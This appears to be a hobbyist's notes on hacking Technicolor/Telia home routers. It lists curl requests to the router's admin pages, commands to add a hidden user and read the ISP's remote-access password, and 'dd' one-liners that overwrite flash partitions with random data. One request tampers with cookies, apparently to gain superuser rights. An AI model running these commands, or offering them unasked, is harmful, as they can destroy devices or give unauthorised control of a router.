If you don't have an iptv setup from your ISP, there is no reason to keep this running it just use resources for nothing
curl 'http://192.168.1.1/modals/internet-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'interface=iptv&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
Set WAN connection on/off
curl 'http://192.168.1.1/modals/internet-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'interface=wan&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
Disable ISP's interace (mgmt) so they wont be able to connect without your knowledge
curl 'http://192.168.1.1/modals/internet-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'interface=mgmt&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
Set DHCP on/off
curl 'http://192.168.1.3/modals/ethernet-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.3' \
-H 'Referer: http://192.168.1.3/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=85a4f11d0eeae627f417a9815d0735716738c75e956c68ae19e4d64c46ce216d;' \
--data-raw 'localdevIP=192.168.1.3&localdevmask=255.255.255.0&dhcpv6=disabled&dhcpv4State=server&dhcpStart=64&dhcpLimit=180&leaseTime=24h&action=SAVE&fromModal=YES&CSRFtoken=681d0f3680a6867f379468b7861460f3d5ef0e947805d0112c756bac7f2f787c' \
--compressed \
--insecure
Set DHCP Guest Mode > off
curl 'http://192.168.1.3/modals/ethernet-modal.lp?intf=guest' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.3' \
-H 'Referer: http://192.168.1.3/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: YPF8827340282Jdskjhfiw_928937459182JAX666=185.213.154.234; sessionID=85a4f11d0eeae627f417a9815d0735716738c75e956c68ae19e4d64c46ce216d; undefined=undefined; superuser=undefined; role=superuser=undefined' \
--data-raw 'localdevIP=192.168.168.1&localdevmask=255.255.255.0&dhcpv6=disabled&dhcpv4State=disabled&dhcpStart=64&dhcpLimit=180&leaseTime=1h&action=SAVE&fromModal=YES&CSRFtoken=681d0f3680a6867f379468b7861460f3d5ef0e947805d0112c756bac7f2f787c' \
--compressed \
--insecure
Device Settings
curl 'http://192.168.1.1/modals/device-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'priority=1&tableid=devices&stateid=&action=TABLE-MODIFY&index=1&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
Telephone Settings
curl 'http://192.168.1.1/modals/mmpbx-global-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'mmpbx_enabled=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
Pair/Unpair Headset
curl 'http://192.168.1.1/modals/mmpbx-dect-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: application/json, text/javascript, */*; q=0.01' \/gateway.lp?auto_update=true&getSessionStatus=true
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'action=pairing_handset&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
List storred phonebook contacts
curl 'http://192.168.1.1/modals/mmpbx-contacts-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--compressed \
--insecure
Print call log
curl 'http://192.168.1.1/modals/mmpbx-log-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--compressed \
--insecure
Clear and Delete all call logs
curl 'http://192.168.1.1/modals/mmpbx-log-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'action=SAVE&operation=RESET&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
Set assistance mode to: on/off
curl 'http://192.168.1.1/modals/assistance-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'ra_enabled=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
Set DMZ enable
Notice: For VBNT-7 the card is found under'bridge-modal.lp' instead of '`dmz-modal.lp')
curl 'http://192.168.1.3/modals/dmz-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: application/json, text/javascript, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.3' \
-H 'Referer: http://192.168.1.3/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=bb647ad9f1eff0e465f392973c7d9b32b7facea8634952251b5b3e447ff1aab0' \
--data-raw 'DMZ_enabled=0&DMZ_flag=1&action=SAVE&fromModal=YES&CSRFtoken=34019b4b0bc60bdac7275e1a3b4a980f33343395b498472bb3b4af076e3d915b' \
--compressed \
--insecure
Minitrr064d
- Create user a user for Minitrr064d
computeHA1 -u <username> -p <password> -r
Self test passed - HA1 computation reliable
Self test passed - authentication check reliable
Computing hash for <username>:minitr064d:<password>
Clash (internet provider is connecting to clash when they remote control the device via shell)
- Add a new user with clash:
clash newsrpuser -u <wuseman> -p <password>
uci set web_back.usr_wuseman.srp_salt='D0124225'
uci add web_back.default.users='usr_wuseman'
uci add web_back.uidefault.defaultuser='wuseman'
uci add web_back.usr_wuseman=user
uci set web_back.usr_wuseman.name='wuseman'
uci set web_back.usr_wuseman.role='wuseman'
uci set web_back.usr_wuseman.gak_id='1'
cat << "EOF" >> /etc/config/web
config user 'usr_wuseman'
option name 'wuseman'
option password_reminder '0'
option srp_verifier 'A955EDB6ECAC0536BA69F9D1F1C7F3D9F8A02FDF29170D4A8506A14F7E6F752FF845DACE10E6B3C66C15EAAB53896E41D541C22F32E9E0E8D60A1D7F1D187604BE8A5653B5CDF327542E8DBE5C8481E40C70BD0506448695F7E85338D4427187A49CF799CDDDD2DB3E6D652A25830C42024EB9A682ED5C27E36B159DB7617F41FF6ED5EF58163AC2C68AC26B3D57749AF3AFEF6352950D79A410150E27CE984EA375613737A235B5E28D006C5CE69DE40B651020505AEB7CE5986829D79B9E0375F5127F090CD400B2A2D06385F9931071415042979C8ED80D328BA4810A1692E263733DA9D85DC7E762859145A0D6A607447FCF4FFD53D144D8E018D4F345C9'
option srp_salt 'D0124225'
EOF
- Few examples of commands yóu can try in
clashenviroment
root>get InternetGatewayDevice.Services.X_000E50_RemoteAccess.
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.IPIntf [string] = InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.WANIPConnection.4
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.User [string] = assist
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Port [unsignedInt] = 60443
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.RandomPassword [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Password [string] = bWi9k7KUF$
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Secure [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Name [string] = remote
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Status [string] = Active
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Start [boolean] = 1
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.Mode [string] = Permanent
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.RandomPort [boolean] = 0
InternetGatewayDevice.Services.X_000E50_RemoteAccess.1.URL [string] = https://10.149.37.203:60443
-
dmdump, thexmlfile will contain over13klines
dmdump
loaded 325 objecttypes from /usr/share/transformer/mappings/igd/ and /usr/share/transformer/mappings/bbf/
could not add NumberOfEntries parameters for:
Device.Routing.Router.{i}.: IPv4ForwardingNumberOfEntries
Device.DHCPv4.Client.{i}.: SentOptionNumberOfEntries
Device.Users.: UserNumberOfEntries
Device.X_Management.: UserNumberOfEntries
Device.WiFi.NeighboringWiFiDiagnostic.: ResultNumberOfEntries
InternetGatewayDevice.X_Management.: UserNumberOfEntries
#ROOT.: LANWLANConfigurationNumberOfEntries
Device.DHCPv4.Server.Pool.{i}.: OptionNumberOfEntries
datamodel written to /tmp/datamodel.xml
XDSLCtl
xdslctl info --cfg
xdslctl info --state
xdslctl info --stats
xdslctl info --SNR
xdslctl info --QLN
xdslctl info --Hlog
xdslctl info --Hlin
xdslctl info --HlinS
xdslctl info --pbParams
xdslctl info --vendor
root>xdslctl profile --show
Modulations:
G.Dmt Enabled
G.lite Enabled
T1.413 Enabled
ADSL2 Enabled
AnnexL Enabled
ADSL2+ Enabled
AnnexM Enabled
VDSL2 Enabled
VDSL2 profiles:
8a Enabled
8b Enabled
8c Enabled
8d Enabled
12a Enabled
12b Enabled
17a Enabled
30a Disabled
US0 Enabled
Phone line pair:
Inner pair
Capability:
bitswap On
sra On
trellis On
sesdrop On
CoMinMgn On
24k On
phyReXmt(Us/Ds) Off/On
Ginp(Us/Ds) On/On
TpsTc AvPvAa
monitorTone: On
dynamicD: On
dynamicF: Off
SOS: On
Training Margin(Q4 in dB): -1(DEFAULT)
,- W-A-R-N-I-N-G------------------------------------------------------,
| |
| - ALL STUFF BELOW MAY BE DANGEROUS AND IT MAY BRICK YOUR DEVICE |
| - IT IS YOU DEVICE and YOU HAVE BEEN WARNED |
| - I TRYING EVERYTHING THATI S POSSIBLETO HACK ANY DEVICE SO |
| - YOU RUNNING ALL SUTFF BELOW ON YOUR OWN RISKS WITHOUT WARNINGS |
| |
'---------------------------------------------------------------E-N-D-'
-
When it's time to send your device back when Telia sending you a new one:
-
THIS IS FOR VBNT-H only
dd if=/dev/urandom of=/dev/mtd1 ## (rootfs - firmware)
dd if=/dev/urandom of=/dev/mtd2 ## (rootfs_data - settings)
dd if=/dev/urandom of=/dev/mtd3 ## (bank_1 - bankversion)
dd if=/dev/urandom of=/dev/mtd4 ## (bank_2 - bankversion)
- In a one-liner:
for mtd in mtd1 mtd2 mtd3 mtd4; do dd if=/dev/urandom of=/dev/${mtd}; done
Some other urls for TG799 hacking, you all rock \m/ -_- \m/
https://weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways/
https://hack-technicolor.readthedocs.io/
https://forums.whirlpool.net.au/archive/2650998
https://www.crc.id.au/hacking-the-technicolor-tg799vac-and-unlocking-features/
https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html
Get In Touch
If you have any problems, questions, ideas or suggestions please don't hesitate to get in touch,
more information on how to contact me and my gpg key can be found at: https://www.nr1.nu/
and for questions only, send a message to -> [email protected]´ as a normal mail.
Please keep in mind for private information or secret things to stay between us please use gpg key and encrypt the email because I won't answer you otherwise, that's how I want it.
That's it, thanks for your support everyone.,
The End
Open Source Agenda Badge
